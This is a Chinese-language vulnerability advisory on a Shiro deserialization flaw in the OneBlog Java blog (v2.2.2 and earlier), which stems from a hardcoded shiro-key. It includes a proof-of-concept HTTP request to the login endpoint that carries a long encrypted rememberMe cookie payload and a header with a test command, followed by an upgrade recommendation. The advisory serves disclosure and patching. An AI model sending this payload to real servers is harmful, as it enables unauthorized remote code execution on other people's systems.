漏洞预警 | OneBlog博客反序列化漏洞

0x00 漏洞编号
  • 暂无

0x01 危险等级
  • 高危
0x02 漏洞概述

OneBlog是一个简洁美观、功能强大并且自适应的Java博客。

0x03 漏洞详情

漏洞类型:反序列化
影响:执行任意命令
简述:OneBlog在v2.2.2及之前的版本存在shiro反序列化漏洞,该漏洞源于软件存在硬编码的shiro-key,攻击者可利用该key生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。

0x04 影响版本
  • OneBlog <= v2.2.2

0x05 POC

GET /passport/login/ HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzipConnection: closeCookie: rememberMe=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X-Token-Data: echo "changge"
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布不承担任何法律及连带责任。

0x06 修复建议

目前官方已发布漏洞修复版本,建议用户升级到安全版本
https://docs.zhyd.me/


免责声明:文章内容不代表本站立场,本站不对其内容的真实性、完整性、准确性给予任何担保、暗示和承诺,仅供读者参考,文章版权归原作者所有。如本文内容影响到您的合法权益(内容、图片等),请及时联系本站,我们会及时删除处理。查看原文

为您推荐